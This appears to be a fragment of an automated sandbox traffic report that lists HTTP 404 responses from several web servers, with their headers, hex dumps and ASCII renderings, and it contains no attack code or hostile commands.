3a ef a6 f3 a7 32 e7 b3 01 73 3e eb e6 b3 a7 Data Ascii: 33fnF={E@I/M&@{V(C,)oc@B/VPQ$QqZ;a\|_@2}"P'D@\v+B@1D\|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf\|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:22:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8UguwgZtjFFAXxrJGfPNYE5hwnVMy62hgTv5mAr63gTP7MLvXd7aKRJbs%2B3nXifU5MPRy%2B0chwIyztvUU%2BM5ZfTGol9OFvGixnLpszYjET3UHeNpDTHe1nINDphZhZvfDOq5cVymtTiOEdPO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90037f96fe141875-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1586&rtt_var=793&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=768&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 34 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 3a ef a6 f3 a7 32 e7 b3 01 73 3e eb Data Ascii: 34bnF={E@I/M&@{V(C,)oc@B/VPQ$QqZ;a\|_@2}"P'D@\v+B@1D\|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf\|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:22:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JaYi7XKrZTSo2LX7lk9JjMDMCKr8DvTR6YXNs6NCa28YUznVpR0nwLLRcjOs3wtQHEmyoAD9pNw08zLbUXdXSDE%2B1RHdarJCXvk7ScNDXS0f8KR456nCFJecP2XcBI4voXn%2FiyC52xHYwdJh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90037fa6dc9b4344-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1729&rtt_var=864&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1785&delivery_rate=0&cwnd=45&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 34 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 3a ef a6 f3 a7 32 e7 b3 01 73 3e eb e6 b3 Data Ascii: 34bnF={E@I/M&@{V(C,)oc@B/VPQ$QqZ;a\|_@2}"P'D@\v+B@1D\|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf\|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:22:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N107vfs0mJNbNEvYNqK0xIo6SpazgXh6tjD57hA0gb0RYyVObszpk8BdkZHRjjGClplTLoBx2FXIpfI9IFrEHEk0ulvN4ydw1Z%2BRsgZgw6YQ4dKe6r7%2Bp29%2BRBj36yqfQbUrx6Bj0Eswwf%2FF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90037fb6d98841a6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1545&min_rtt=1545&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=473&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:22:31 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:22:34 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:22:36 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Sat, 11 Jan 2025 08:22:39 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:23:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
